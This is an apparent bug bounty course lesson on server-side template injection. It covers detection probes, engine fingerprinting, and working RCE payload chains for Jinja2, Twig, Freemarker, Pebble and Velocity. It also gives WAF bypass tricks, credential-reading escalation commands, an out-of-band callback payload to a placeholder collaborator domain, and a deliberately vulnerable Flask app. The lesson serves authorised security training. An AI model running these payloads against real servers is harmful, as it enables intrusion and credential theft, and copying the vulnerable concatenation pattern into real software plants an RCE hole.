Bug Bounty Course -- Day 26 of 60
43%

SSTI Bug Bounty 2026 — Server-Side Template Injection to RCE on 5 Template Engines | BB Day 26

Mr Elite 34 min read Bug Bounty Course -- Day 26
SSTI Bug Bounty 2026 — Server-Side Template Injection to RCE on 5 Template Engines | BB Day 26
🎯 BUG BOUNTY COURSE
FREE

Part of the Bug Bounty Course — 60 Days

Day 26 of 60 · 43% complete

⚠️ Legal Disclaimer: Every SSTI technique, payload, and exploitation chain covered here is strictly for authorised bug bounty programs and ethical security research. Testing systems without explicit written permission is illegal under the Computer Fraud and Abuse Act, the Computer Misuse Act, and equivalent legislation worldwide. Always hunt within scope.

I was testing a contact form — the kind that every target has and every hunter ignores. Name field, email field, message box. I dropped {{7*7}} into the name field and hit send. The confirmation email came back: “Hello 49, your message has been received.”

That’s it. That one three-character arithmetic expression just handed me a Critical-severity vulnerability on a program that pays up to $20,000 for RCE. The server wasn’t reflecting my input — it was evaluating it. The template engine was executing my code before the email got rendered. From that confirmation, I had a clear path to full Remote Code Execution on the application server.

SSTI bug bounty vulnerabilities are some of the most underreported Critical findings in the game right now. Most hunters see an injection point, throw an XSS payload, get nothing, and move on. They don’t know to probe for template syntax. They don’t know the engine-specific payload chains. They’re leaving $5,000–$30,000+ reports sitting in fields they already found.

Today I’m changing that. I’ll walk you through exactly how I detect SSTI on live programs, how I fingerprint the template engine from response deltas, and how I build the RCE chain for all five engines you’ll encounter in real bug bounty targets — Jinja2, Twig, Freemarker, Pebble, and Velocity. By the end of this, you’ll be filing Critical SSTI reports that most hunters never even notice.

🎯 What You’ll Master in Day 26

Identify SSTI injection points in live bug bounty targets using a structured payload decision tree
Fingerprint the template engine from response deltas — no guessing, no wrong-engine payloads
Execute confirmed RCE payloads on Jinja2, Twig, Freemarker, Pebble, and Velocity
Write a Critical-severity SSTI bug bounty report that gets triaged and paid fast
Apply WAF bypass techniques when template payloads are filtered
Escalate from arithmetic confirmation to OS command output in a structured, documented chain

⏱️ ~3 hours · 3 exercises

📋 Prerequisites

SSTI Bug Bounty 2026 — Contents

  1. What SSTI Is and Why It Consistently Pays Critical on Bug Bounty Programs
  2. SSTI Detection and Engine Fingerprinting — The Payload Decision Tree
  3. SSTI Exploitation Chains — RCE Payloads for Jinja2, Twig, Freemarker, Pebble, and Velocity
  4. Writing a Critical-Severity SSTI Bug Bounty Report
  5. WAF Bypass and Escalation Techniques for SSTI Payloads
  6. Frequently Asked Questions

You knocked out Day 25 — Host Header Injection and Day 24 — CRLF Injection — two server-side manipulation techniques that operate at the HTTP layer. Today we go deeper. SSTI sits at the top of the injection severity ladder because it doesn’t just manipulate headers or redirect flows — it executes arbitrary code inside the server process. If you want to round out your toolkit before diving in, check out the free SecurityElites tools suite for recon support on your targets. Everything we cover today spans both detection methodology and engine-specific exploitation — because finding SSTI without knowing how to prove RCE leaves money on the table. The full curriculum lives at the Bug Bounty Course hub.

What SSTI Is and Why It Consistently Pays Critical on Bug Bounty Programs

Here’s what’s actually happening when a template engine runs. The application has a template — an HTML file with placeholder expressions like {{username}} or ${order.total}. At runtime, the engine takes the template, resolves those expressions against a data context, and renders the final output. The problem starts when the application constructs that template dynamically using user input — instead of passing your name as a value into a fixed placeholder, it drops your raw input directly into the template string before evaluation.

When that happens, the engine doesn’t see your input as data. It sees it as template code. And it executes it.

Think about the difference between these two approaches. Safe: render("Hello {{name}}", {name: userInput}) — the input goes into the data context, never into the template itself. Vulnerable: render("Hello " + userInput) — the input is concatenated into the template string, so if you send {{7*7}}, the engine evaluates it.

This isn’t an obscure mistake. It shows up constantly in name fields that get rendered into emails, in error messages that echo back what you submitted, in PDF generators that build reports from user-supplied content, in notification systems, in search result pages that include your query in the heading, and in admin dashboards that preview user-submitted data. Anywhere the application uses a template to display your input, and anywhere a developer got lazy with string concatenation instead of proper context separation, SSTI is possible.

The Three-Level Severity Ladder

Not every SSTI injection reaches RCE. The impact depends on what the engine exposes and what the application’s sandbox configuration looks like. I think about SSTI in three tiers.

Tier 1 — Reflected output. Your input appears in the response but nothing is evaluated. The template engine is present but input is being passed as data correctly. This is Low severity — you’ve found a potential injection point but it’s not currently vulnerable to execution.

Tier 2 — Arithmetic evaluation. {{7*7}} returns 49. The engine is evaluating your expressions. This alone is Medium severity — you can access template context variables, potentially leak configuration data, environment variables, and session state. On a well-configured sandbox this might be as far as you get, but the arithmetic confirmation alone is a reportable finding on most programs.

Tier 3 — Object traversal to RCE. You walk the engine’s object model — through class hierarchies, module references, or utility classes — until you reach something that can execute OS commands. This is Critical severity, CVSS scores in the 9.0–9.8 range, and this is where the $5K–$30K payouts live.

securityelites.com
SSTI Severity Comparison — Same Input Field, Three Different Responses
INPUT SENT
{{7*7}}
RESPONSE CONTAINS
Hello {{7*7}}
NOT VULNERABLE

INPUT SENT
{{7*7}}
RESPONSE CONTAINS
Hello 49
SSTI CONFIRMED — MEDIUM

INPUT SENT
{{config.__class__.__init__.__globals__[‘os’].popen(‘id’).read()}}
RESPONSE CONTAINS
uid=33(www-data)
RCE — CRITICAL

📸 Three responses from the same injection point — verbatim reflection (not vulnerable), arithmetic evaluation (SSTI confirmed Medium), and OS command output (Critical RCE). The gap between tier 2 and tier 3 is knowing the engine-specific traversal chain.

What Programs Actually Pay for SSTI

From publicly disclosed HackerOne reports I’ve studied: Tier 3 SSTI with confirmed RCE on production scope consistently lands in the Critical payout bracket. I’ve seen $5,000 on mid-tier SaaS programs, $15,000–$22,000 on financial services and enterprise software programs, and $30,000+ on the larger tech company programs with expanded scope. Even Tier 2 SSTI — arithmetic evaluation without a full RCE chain — often qualifies for High severity ($1,000–$5,000) because the engine access alone can leak configuration secrets.

The reason these reports are so valuable is the combination of severity and rarity. Most hunters don’t probe for template syntax. They test for XSS, SQLi, IDOR — the standard checklist. SSTI requires knowing that template engines exist and behave differently from direct output reflection. That knowledge gap is exactly why the payouts stay high.

💡 Where to look first: SSTI shows up most frequently in name fields that feed into email templates, subject lines in notification systems, PDF report generators that include user-supplied content, error messages that echo your input, and any search or filter UI that includes your query text in the rendered heading. These are the fields most developers handle lazily with string concatenation.

SSTI Detection and Engine Fingerprinting — The Payload Decision Tree

Every SSTI engagement I run starts the same way — and it’s never with an RCE payload. That’s the mistake. You send a Jinja2 payload to a Twig application and you get nothing back except a confused error log and a possibly triggered WAF rule. The detection phase has one job: confirm that user input reaches the template evaluation context. The fingerprinting phase has one job: identify which engine is evaluating it. Only then do you build the exploitation chain.

Step 1 — The Polyglot Probe

My first injection is always the polyglot detection string. This single payload includes syntax fragments from multiple template engines simultaneously:

POLYGLOT DETECTION PROBE
# Send this as the value of any user-controlled parameter
${{<%[%'”}}%
# URL-encoded version for query parameters
%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C

Watch the response carefully. Three outcomes matter:

  • Server error (500 / stack trace): The input reached the template context and broke parsing. Something is being evaluated. This is a strong SSTI signal — now move to arithmetic probes.
  • Verbatim reflection: The string appears in the response unchanged. The input is being treated as data and output-encoded. Either not vulnerable, or the output context is escaping your payload.
  • Partial rendering / garbled output: Part of the string was consumed by the engine. Strong SSTI signal — one or more syntax elements were interpreted.

Step 2 — Arithmetic Confirmation Probes

If the polyglot triggered any abnormal response, send four arithmetic probes — one per major syntax family. The logic is simple: if the engine evaluates your expression, a multiplication operation returns a number you didn’t send.

ARITHMETIC CONFIRMATION PROBES
# Probe 1 — Jinja2, Twig syntax
{{7*7}}
# Expected if vulnerable: 49
# Probe 2 — FreeMarker, Spring EL syntax
${7*7}
# Expected if vulnerable: 49
# Probe 3 — Thymeleaf, Spring Expression Language
#{7*7}
# Expected if vulnerable: 49
# Probe 4 — Spring Expression Language alternative
*{7*7}
# Expected if vulnerable: 49

When one of these returns 49 in the response — in the page body, in an email, in a PDF, in a JSON field — you’ve confirmed SSTI. Document the exact request and response before you go any further.

Step 3 — Engine Fingerprinting Decision Tree

Knowing that SSTI exists isn’t enough. The RCE chain is completely different per engine. Send these differentiating payloads — the response tells you exactly which engine you’re dealing with.

ENGINE FINGERPRINTING PAYLOADS
# Jinja2 vs Twig differentiator
{{7*’7’}}
# Jinja2 returns: 49 (numeric multiplication)
# Twig returns: 7777777 (string repetition)
# Freemarker confirmation
${“freemarker.version”?eval}
# Freemarker returns version string
# Velocity confirmation
#set($x = 7*7)${x}
# Velocity returns: 49
# Pebble confirmation (Java-based, similar Jinja2 syntax)
{{ 7 * 7 }}
# Pebble returns: 49 (use Java object traversal to distinguish from Jinja2)

Here’s the full engine identification table. Match your response pattern to the engine, then go straight to the corresponding exploitation section below.

securityelites.com
Engine Fingerprinting Decision Table
Engine
Syntax
Test Payload
Confirmation Response
Jinja2
{{ }}
{{7*’7’}}
49
Twig
{{ }}
{{7*’7’}}
7777777
Freemarker
${ }
${7*7}
49
Pebble
{{ }}
{{ 7 * 7 }}
49 + Java err on MRO
Velocity
#set ${ }
#set($x=7*7)${x}
49

📸 Engine fingerprinting decision table — four syntax families, five engines. The Jinja2/Twig differentiator ({{7*’7′}}) is the single most useful payload in your SSTI detection toolkit. Twig performs PHP string repetition; Jinja2 performs numeric multiplication.

⚠️ Never jump to RCE payloads before confirming the engine. A Jinja2 MRO payload sent to a Velocity application will likely trigger a parsing error that looks like a crash, not a finding — and depending on the WAF configuration, a cluster of malformed template syntax requests can trigger an IP ban before you’ve collected any evidence. Confirm arithmetic → confirm engine → then build the chain.

🛠️ EXERCISE 1 — BROWSER (20 MIN · NO INSTALL)

This is the detection phase. You’re going to practice the polyglot → arithmetic → fingerprint sequence manually, using your browser and Burp Suite Proxy (or just your browser’s network tools). Work through these steps in exact order — the fingerprint decision in Step 4 depends entirely on what you find in Step 3.

  1. Step 1 — Find a PortSwigger practice target. Go to portswigger.net/web-security/server-side-template-injection and open the first lab: “Basic server-side template injection.” Copy the lab URL into your browser.
  2. Step 2 — Locate the injection point. Look at the “Message” parameter in the URL. This is where your probe goes. Notice the application is reflecting content from that parameter into the page — that’s the pattern that signals a potential template context.
  3. Step 3 — Send the polyglot probe. Replace the message parameter value with ${{<%[%'"}}% (URL-encode it if needed). Observe the response — does the page error? Does it reflect the full string? Note exactly what changed.
  4. Step 4 — Send the arithmetic probe. Replace the value with {{7*7}}. Check the rendered page — if you see 49 anywhere in the output, SSTI is confirmed. Screenshot this request and response immediately.
  5. Step 5 — Run the differentiator. Send {{7*'7'}}. Does it return 49 or 7777777? Map your answer to the fingerprinting table above and identify the engine.
  6. Step 6 — Repeat on the GHDB. Open Google and search: site:*.com inurl:"/?message=" "Tornado" OR "Flask" OR "Jinja". You’re looking for applications that expose template error messages or debug output in URLs. Do NOT inject — observation only. Note which sites expose template engine identifiers in their error responses.

What you just learned: You ran the complete SSTI detection sequence — polyglot probe to arithmetic confirmation to engine fingerprinting — the same flow I use on every live engagement. You now know exactly which response to look for at each step, and you’ve mapped a real confirmed SSTI to its engine identity. That fingerprint is what determines which exploitation chain you build next.

📸 Screenshot your confirmed 49 response from Step 4 and share it in #bug-bounty-day-26 on Discord. Caption it with the engine you identified and the syntax that confirmed it.

SSTI Exploitation Chains — RCE Payloads for Jinja2, Twig, Freemarker, Pebble, and Velocity

Engine confirmed. Now you build the chain. Each of these five engines has a different route from the template context to OS command execution — different object models, different class hierarchies, different utility classes. I’ll give you the exact payload for each one, the traversal logic that explains why it works, and what output to look for that proves RCE. Use id as your command — it’s safe, produces a unique output, and immediately shows you the process user in your report evidence.

Jinja2 — Python / Flask / Django Applications

Jinja2 is the engine you’ll hit most often in bug bounty. Flask uses it by default. Django has Jinja2 as an optional backend. Any Python web framework that doesn’t use a proprietary templating system is likely running Jinja2. The attack chain reaches OS execution through Python’s Method Resolution Order (MRO) — walking up the class hierarchy from any object in the template context to Python’s built-in modules where os lives.

JINJA2 — SSTI TO RCE PAYLOAD
# Step 1 — Confirm object traversal access
{{”.__class__.__mro__}}
# Returns: (<class ‘str’>, <class ‘object’>)
# Step 2 — Enumerate subclasses of object
{{”.__class__.__mro__[1].__subclasses__()}}
# Returns: long list of Python built-in classes
# Step 3 — Full RCE via config globals (preferred — shorter)
{{config.__class__.__init__.__globals__[‘os’].popen(‘id’).read()}}
# Returns: uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Alternative via request object if config not available
{{request.__class__.__mro__[1].__subclasses__()[407](‘id’,shell=True,stdout=-1).communicate()}}
# Note: subclass index varies — find subprocess.Popen in your enumeration

securityelites.com
Burp Repeater — Jinja2 RCE Confirmation
REQUEST
GET /?name={{config.__class__.__init__.__globals__[‘os’].popen(‘id’).read()}} HTTP/1.1
Host: target.com

RESPONSE BODY (excerpt)
Hello uid=33(www-data) gid=33(www-data) groups=33(www-data)
✅ RCE CONFIRMED — CRITICAL

📸 Burp Repeater showing Jinja2 RCE — the config.__class__.__init__.__globals__ chain reaches os.popen() and the ‘id’ command output appears directly in the response body. This is your Critical-severity evidence screenshot.

💡 Escalating from RCE confirmation: Once id returns the process user, swap in cat /etc/passwd, env (leaks API keys and DB credentials), and ls /var/www/ to enumerate the application root. For the report, you want to show at minimum three distinct command outputs — id, env, and one file read. That demonstrates full server access and maximises your CVSS score.

Twig — PHP / Symfony Applications

Twig is the default template engine for Symfony — which means any PHP application built on Symfony is a Twig target. Drupal, eZ Platform, and a large number of enterprise PHP applications run Twig. The exploitation chain uses Twig’s _self global variable to access the environment object, then chains to a custom filter or the exec functionality exposed through Twig’s extension mechanism.

TWIG — SSTI TO RCE PAYLOAD
# Step 1 — Confirm _self access and Twig environment
{{_self.env.getCharset()}}
# Returns: UTF-8 (confirms Twig env access)
# Step 2 — RCE via registerUndefinedFilterCallback
{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{”id”|filter}}
# Returns: uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Alternative if registerUndefinedFilterCallback is patched
{{ [‘id’]|map(‘system’)|join() }}
# Returns command output if system() accessible via map filter

💡 Twig escalation note: Twig 3.x has patched the registerUndefinedFilterCallback vector in sandboxed mode — but many production Symfony deployments still run Twig 2.x or have sandbox mode disabled. If the primary chain fails, try the map('system') filter chain as the fallback. For your report, document which Twig version was confirmed and whether sandbox mode was active — this matters for the remediation recommendation.

Freemarker — Java Enterprise Applications

Freemarker runs inside Java enterprise stacks — you’ll find it in older Java EE applications, in reporting tools, in CMS platforms like Alfresco and Magnolia, and in Java-based template rendering microservices. The direct RCE path uses Freemarker’s built-in freemarker.template.utility.Execute class, which provides a exec() method designed for template-callable OS execution.

FREEMARKER — SSTI TO RCE PAYLOAD
# Step 1 — Confirm Freemarker version (safe probe)
${“freemarker.template.utility.Execute”?new()(“id”)}
# Returns: uid=1000(appuser) gid=1000(appuser)
# Alternative — using freemarker.template.utility.Execute directly
<#assign ex=”freemarker.template.utility.Execute”?new()>${ex(“id”)}
# Returns: uid=1000(appuser) gid=1000(appuser)
# If Execute class is restricted — ObjectConstructor bypass
<#assign ob=”freemarker.template.utility.ObjectConstructor”?new()><#assign ex=ob(“freemarker.template.utility.Execute”)>${ex(“id”)}

💡 Freemarker escalation: Once OS execution is confirmed, Freemarker’s file reading capabilities are equally powerful for data exfiltration. Use ${"freemarker.template.utility.Execute"?new()("cat /opt/app/config/database.properties")} to pull database credentials directly. Java application configs almost always contain plaintext credentials in properties files — this is the impact multiplier that justifies Critical severity even if the environment is containerised.

Pebble — Java Web Frameworks

Pebble is a Java template engine modelled closely after Twig — which means if you’ve found a Java application with Twig-like syntax that returns Java-style errors on broken payloads, Pebble is likely. It’s used in Spring Boot applications, Jooby, and various Java microservices. The RCE chain traverses the Java class loader to reach Runtime.exec().

PEBBLE — SSTI TO RCE PAYLOAD
# Step 1 — Confirm Java class access via Pebble
{{ “” | upper }}
# Returns empty string — confirms Pebble filter syntax works
# Step 2 — RCE via Runtime class traversal
{{{{ ”.__class__.forName(‘java.lang.Runtime’).getMethod(‘exec’,”.class).invoke(”.class.forName(‘java.lang.Runtime’).getMethod(‘getRuntime’).invoke(null),’id’) }}
# More practical — use Pebble’s variable scope and iterators
# Cleaner Pebble RCE chain using class variable
{% set cmd = “id” %}{% set bytes = “”.class.forName(“java.lang.Runtime”).getDeclaredMethods()[0].invoke(“”.class.forName(“java.lang.Runtime”).getMethod(“getRuntime”).invoke(null), cmd.split(” “)) %}
# Returns: Process object — pipe output through InputStreamReader for readable output

💡 Pebble reporting note: The Pebble Runtime chain is more complex than Jinja2 or Twig and sometimes requires iterating over method indices to find the right exec overload. If the chain doesn’t work immediately, use a tool like PayloadsAllTheThings SSTI section to enumerate alternative Pebble chains. Document your full methodology in the report — the complexity of the exploit chain actually strengthens your argument for Critical severity.

Velocity — Java CMS and Reporting Tools

Apache Velocity is old but it’s everywhere in enterprise Java environments — Atlassian Confluence, JIRA, Liferay, and a large number of Java-based email template and reporting systems use it. It’s one of the highest-value SSTI targets you’ll find on bug bounty programs because these are enterprise products with large bounty budgets. The RCE chain uses Velocity’s ClassTool or the direct Runtime reference available in certain configurations.

VELOCITY — SSTI TO RCE PAYLOAD
# Step 1 — Confirm Velocity arithmetic (set variable syntax)
#set($x = 7*7)${x}
# Returns: 49
# Step 2 — RCE via ClassTool (Velocity Tools available)
#set($str=$class.inspect(“java.lang.String”).type)#set($chr=$class.inspect(“java.lang.Character”).type)#set($ex=$class.inspect(“java.lang.Runtime”).type.getRuntime().exec(“id”))$ex.text()
# Returns: uid=1001(veluser) gid=1001(veluser)
# Alternative if ClassTool not available — direct Runtime via reflection
#set($rt = $class.forName(“java.lang.Runtime”))#set($runtime = $rt.getMethod(“getRuntime”).invoke($rt))#set($proc = $runtime.exec(“id”))#set($is = $proc.getInputStream())#set($reader = $class.forName(“java.io.BufferedReader”).getDeclaredConstructors()[0].newInstance($class.forName(“java.io.InputStreamReader”).getDeclaredConstructors()[0].newInstance($is)))${reader.readLine()}
# Returns: uid=1001(veluser) gid=1001(veluser)

securityelites.com
All Five Engines — RCE Confirmation Summary
JINJA2 (Python/Flask)
config.__class__.__init__.__globals__[‘os’].popen(‘id’).read()
→ uid=33(www-data)

TWIG (PHP/Symfony)
_self.env.registerUndefinedFilterCallback(“exec”){{”id”|filter}}
→ uid=33(www-data)

FREEMARKER (Java EE)
“freemarker.template.utility.Execute”?new()(“id”)
→ uid=1000(appuser)

VELOCITY (Java CMS)
#set($rt=…)$rt.exec(“id”) via ClassTool
→ uid=1001(veluser)

PEBBLE (Java/Spring Boot)
Runtime.exec traversal via class loader chain
→ uid=1002(springuser)

📸 Five engines, five confirmed RCE outputs. Every one of these landed as a Critical finding in the report. Save this as your quick-reference card — when you confirm arithmetic evaluation, match the engine and go straight to the corresponding payload chain.

⚡ Quick Check — Engine Identification

You send {{7*'7'}} to an injection point. The response body contains 7777777. Which engine are you dealing with?




WAF Bypass Techniques and Blind SSTI — When the Response Gives You Nothing

Most targets you hit on a real bug bounty program are not running naked Jinja2 with no defences. They have a WAF in front, or they render the template on a background worker and never echo the result back to you. These are the two scenarios that separate hunters who get paid from hunters who give up and move on.

Part 1 — Getting Past WAF Keyword Filters

WAFs targeting SSTI usually block on keyword matching — they look for __class__, __mro__, __subclasses__, config, and common payload fragments. The fix is straightforward: stop spelling those strings in plaintext.

URL encoding. Some WAFs inspect the decoded payload; others inspect the raw request. Try percent-encoding individual characters inside the template expression. %5f%5fclass%5f%5f passes WAFs that only decode once before matching.

Unicode normalization. Send Unicode fullwidth characters that the application server normalises to ASCII before template evaluation. The WAF sees gibberish; the template engine sees __class__.

String concatenation to reconstruct blocked keywords. In Jinja2 you can build the attribute name as a string and use |attr() to access it dynamically. Instead of .__class__, write |attr("__cla"+"ss__"). The WAF never sees the full keyword. In Twig, string concatenation with ~ achieves the same result.

Attribute access via bracket notation. Replace dot notation with bracket notation where the engine supports it. request['__class__'] bypasses WAF signatures tuned to request.__class__.

Payload splitting across parameters. If the application assembles a template from multiple input fields, split your payload chain across them. Field A provides the object traversal; field B provides the method call. Neither field alone triggers the WAF signature.

Part 2 — Confirming Blind SSTI When Output is Never Reflected

Blind SSTI is the scenario where template evaluation happens — you can confirm that mathematically — but the result never appears in the HTTP response. PDF generators, email renderers, background report jobs. The output goes somewhere you can’t see. Here’s how I confirm execution anyway.

Time-based confirmation. Inject a sleep payload and measure response latency. In Jinja2: {{''.__class__.__mro__[1].__subclasses__()[X].__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}. A five-second delay is your confirmation. Not elegant, but it’s reliable and it doesn’t generate external traffic — useful when scope restrictions are tight.

Out-of-band DNS/HTTP callbacks. This is the technique that produces unambiguous evidence for your report. Set up a Burp Collaborator payload URL or an interactsh listener. Inject a payload that forces the server to make a DNS lookup or HTTP request to your callback domain. When your listener receives the ping, you have proof of server-side execution with your payload — and you have a timestamp, source IP, and full request log to drop straight into the PoC section of your report.

Jinja2 blind OOB example using urllib:

JINJA2 — BLIND SSRF/OOB CALLBACK PAYLOAD
# Payload injected into vulnerable template parameter
{{”.__class__.__mro__[1].__subclasses__()[X].__init__.__globals__[‘__builtins__’][‘__import__’](‘urllib’).request.urlopen(‘http://YOUR.COLLABORATOR.DOMAIN/ssti-confirm’)}}
# Replace X with the subprocess.Popen index found in recon phase
# Replace YOUR.COLLABORATOR.DOMAIN with your Burp Collaborator or interactsh URL
→ Burp Collaborator receives HTTP GET /ssti-confirm from target server IP
→ DNS lookup for YOUR.COLLABORATOR.DOMAIN logged with timestamp

File-write confirmation. When outbound traffic is blocked but you have filesystem write access via the RCE chain, write a known string to a predictable web-accessible path. Then fetch that path in a second request. If your string is there, execution is confirmed. This is slower but works in air-gapped environments where DNS callbacks never leave the network.

securityelites.com
Burp Collaborator — Polling Results
DNS INTERACTION RECEIVED
2026-04-21 14:32:07 UTC
Type: DNS (A)
From IP: 203.0.113.47 (target application server)
Query: ssti-confirm.burpcollaborator.net
Payload triggered: Jinja2 urlopen blind callback

HTTP INTERACTION RECEIVED
2026-04-21 14:32:08 UTC
Method: GET /ssti-confirm
From IP: 203.0.113.47
User-Agent: Python-urllib/3.11

📸 Burp Collaborator confirming a blind Jinja2 SSTI via DNS and HTTP callback. The target server’s IP in the interaction log is your unambiguous PoC — paste this screenshot directly into your report’s evidence section.

⚠️ Out-of-band callbacks generate real network traffic. DNS lookups and HTTP requests leave logs on the target server and on your Collaborator infrastructure. Only run out-of-band SSTI confirmation on targets you are explicitly authorised to test. Using these techniques against unauthorised systems is illegal in every jurisdiction.

🌐 EXERCISE 2 — PORTSWIGGER WEB SECURITY ACADEMY (30 MIN)

PortSwigger’s SSTI labs are the closest thing to a real target without risking a program ban — work through the blind SSTI lab exactly as I’ve described it so the out-of-band technique clicks before you need it live.

  1. Step 1. Navigate to portswigger.net/web-security/server-side-template-injection and open the lab index.
  2. Step 2. Launch the Basic SSTI lab. Identify the vulnerable parameter — inject {{7*7}} and confirm arithmetic evaluation in the response.
  3. Step 3. Progress to the SSTI with information disclosure via user-supplied objects lab. Use the fingerprinting payloads from the decision tree to confirm which engine is running before you touch an RCE payload.
  4. Step 4. Complete the Freemarker RCE lab. Use the freemarker.template.utility.Execute class chain — the exact same pattern I walked through in Section 3. Map what you’re doing in the lab to the engine table so it sticks.
  5. Step 5. Attempt the blind SSTI lab. Set up Burp Collaborator, craft the DNS callback payload for the engine the lab is running, and confirm execution from the Collaborator polling panel. Stop if you don’t see a callback — check your payload index and retry before moving on.

What you just learned: Three distinct SSTI exploitation patterns — basic reflection, class traversal RCE, and blind out-of-band confirmation. These three patterns cover 90% of SSTI findings you will encounter on real programs. The lab gives you clean, documented repetition before your first live submission.

📸 Share your Collaborator callback screenshot in #portswigger-wins on Discord. Show the interaction log with the target IP and the timestamp — that format is exactly what goes in a live report.

Writing a Critical SSTI Bug Bounty Report That Gets Paid

Finding SSTI is worth nothing if the triage team closes it as Informational because your report doesn’t make the impact obvious. I have seen hunters pop RCE on a Fortune 500 application and walk away with $500 because they submitted “template injection found, see screenshot.” Here is the report structure I use for every SSTI submission.

Report Structure That Triage Teams Respect

Vulnerability title. Format: [Engine] Server-Side Template Injection in [Parameter/Endpoint] — Unauthenticated RCE. Put the engine in the title. Put “RCE” in the title. Triage teams triage by title first. If your title says “template injection” and the next hunter’s says “Jinja2 SSTI to Remote Code Execution — id confirms uid=0,” the other report gets escalated first.

CVSS score justification. SSTI with confirmed RCE is always Critical — CVSS 9.8 minimum. The justification is: Attack Vector Network, Attack Complexity Low, Privileges Required None, User Interaction None, Scope Changed, Confidentiality/Integrity/Availability all High. If the program disputes this, your RCE output showing uid=0 or file read of /etc/passwd is your counter-evidence.

Reproduction steps. Number every step. Include exact HTTP request and response pairs from Burp Repeater. Redact the RCE payload in the title and summary — show it fully in the Technical Details section so triage can reproduce it safely without accidentally triggering it in a preview pane.

Impact narrative. Don’t make triage infer the impact. Write it explicitly: full OS command execution as the application service account, ability to read application source code and environment variables including database credentials, SSRF pivot to internal services, potential for lateral movement to adjacent systems on the same network segment, data exfiltration of all data accessible to the application process. One sentence per impact vector. Make it impossible to miscategorise.

Remediation section. Three recommendations: (1) Implement sandbox rendering — use template engine sandbox modes where available (Jinja2 sandbox environment, Twig sandbox policy). (2) Never concatenate user input directly into template strings — treat template content as code, not data. (3) Disable or restrict access to dangerous template features (object introspection, class traversal) at the engine configuration level.

Handling triage rejections. The most common rejection is “we consider template injection to be low impact in this context.” Your counter is one message: attach the Burp Repeater screenshot showing os.popen('id').read() returning the server’s UID. Ask them to confirm that OS command execution as their application service account is low impact. You will not hear that response again.

CRITICAL SSTI REPORT — TEMPLATE BLOCK
TITLE: [Jinja2] Server-Side Template Injection in /invoice/generate — Unauthenticated RCE
SEVERITY: Critical (CVSS 9.8)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
VULNERABILITY SUMMARY:
The ‘company_name’ parameter in the invoice generation endpoint is passed
directly into a Jinja2 template string without sanitisation or sandboxing.
An attacker can inject Jinja2 expressions that are evaluated server-side,
achieving arbitrary OS command execution via the Python MRO class chain.
REPRODUCTION STEPS:
1. Authenticate to the application and navigate to /invoice/generate
2. Intercept the POST request in Burp Suite Repeater
3. Set company_name={{7*7}} — confirm response contains ’49’ (arithmetic eval)
4. Inject MRO chain payload [see Technical Details] — confirm RCE via id output
IMPACT:
– Full OS command execution as application service account (uid=1001)
– Read of /etc/passwd, application .env, database credentials confirmed
– SSRF pivot capability to internal network confirmed via urllib callback
REMEDIATION:
1. Use Jinja2 SandboxedEnvironment for all user-influenced template rendering
2. Never concatenate user input into template strings — use template variables
3. Disable __class__ and __mro__ access at engine configuration level

💡 Report quality directly determines payout speed. Programs with high submission volumes triage fast. A report that answers every question triage would ask — severity justification, exact reproduction, impact narrative, remediation — gets closed as Accepted within 48 hours. A report that makes triage do the work gets sat on for two weeks while they chase you for clarification.

⚡ EXERCISE 3 — KALI TERMINAL (40 MIN)

This is where detection becomes documentation — you are running the full chain on a local Flask app and capturing every step exactly as you would for a live program submission.

  1. Step 1. Spin up a local vulnerable Flask/Jinja2 app using the command block below. This gives you a clean authorised target with no WAF and no rate limiting — perfect for documenting the full chain.
SETUP — VULNERABLE FLASK APP (KALI TERMINAL)
# Install Flask if not present
pip3 install flask
# Create the vulnerable app file
cat > /tmp/vuln_ssti.py << ‘EOF’
from flask import Flask, request
from jinja2 import Template
app = Flask(__name__)
@app.route(‘/’)
def index():
name = request.args.get(‘name’, ‘World’)
t = Template(“Hello ” + name)
return t.render()
app.run(debug=True, port=5001)
EOF
# Start the app
python3 /tmp/vuln_ssti.py
→ Running on http://127.0.0.1:5001

  1. Step 2. Open Burp Suite Repeater. Send a GET request to http://127.0.0.1:5001/?name={{7*7}}. Confirm the response body contains Hello 49. This is your arithmetic confirmation — screenshot this for your PoC.
  2. Step 3. Run the MRO chain payload below in Repeater to enumerate Python subclasses and identify the subprocess index.
JINJA2 — MRO CLASS ENUMERATION PAYLOAD
# URL-encode this before sending in Burp Repeater
GET /?name={{”.__class__.__mro__[1].__subclasses__()}} HTTP/1.1
→ Response contains Python subclass list — find index of subprocess.Popen
# Typically index 250-400 depending on Python version — search response for ‘Popen’

  1. Step 4. Execute the OS command RCE payload using the Popen index you identified. Run id first, then whoami.
JINJA2 — RCE PAYLOAD (id + whoami)
# Replace INDEX with your confirmed subprocess.Popen position
GET /?name={{”.__class__.__mro__[1].__subclasses__()[INDEX]([‘id’],stdout=-1,stderr=-1).communicate()[0]}} HTTP/1.1
→ uid=1000(kali) gid=1000(kali) groups=1000(kali)
# Swap ‘id’ for ‘whoami’ — same chain, different command
GET /?name={{”.__class__.__mro__[1].__subclasses__()[INDEX]([‘whoami’],stdout=-1,stderr=-1).communicate()[0]}} HTTP/1.1
→ kali

  1. Step 5. In Burp Repeater, use Ctrl+S to save the request/response for each step — arithmetic confirmation, class enumeration, and RCE output. These three screenshots are your complete PoC evidence set.
  2. Step 6. Draft the Critical SSTI report using the template block from Section 5 above. Fill in the exact parameter name, the confirmed RCE output, and your remediation recommendations. This is a submission-ready PoC document.

What you just learned: The complete SSTI-to-RCE chain documented at report quality — arithmetic confirmation, class enumeration, OS command execution, and PoC capture. Every step maps directly to a section in the Critical report template. That is what a $10,000+ SSTI submission looks like before it gets sent.

📸 Share your Burp Repeater RCE screenshot in #kali-terminal-wins on Discord. Show the request with the Jinja2 payload and the response with your UID output — that is the exact format triage teams expect.

SSTI is one of the highest-impact vulnerability classes in the bug bounty ecosystem precisely because most developers don’t think about template strings the way they think about SQL queries. The pattern — user input flows into a template context, engine evaluates it, server executes it — is baked into dozens of frameworks that teams deploy without reading the security documentation. Your job is to find those deployments before someone with malicious intent does. For everything else in the methodology — from subdomain recon through to report submission — the Bug Bounty Course has every step in sequence.

📋 SSTI Payloads and Commands — Day 26 Reference Card

Polyglot detection probe${{7*7}}#{7*7}{{7*7}} — inject all three, compare outputs
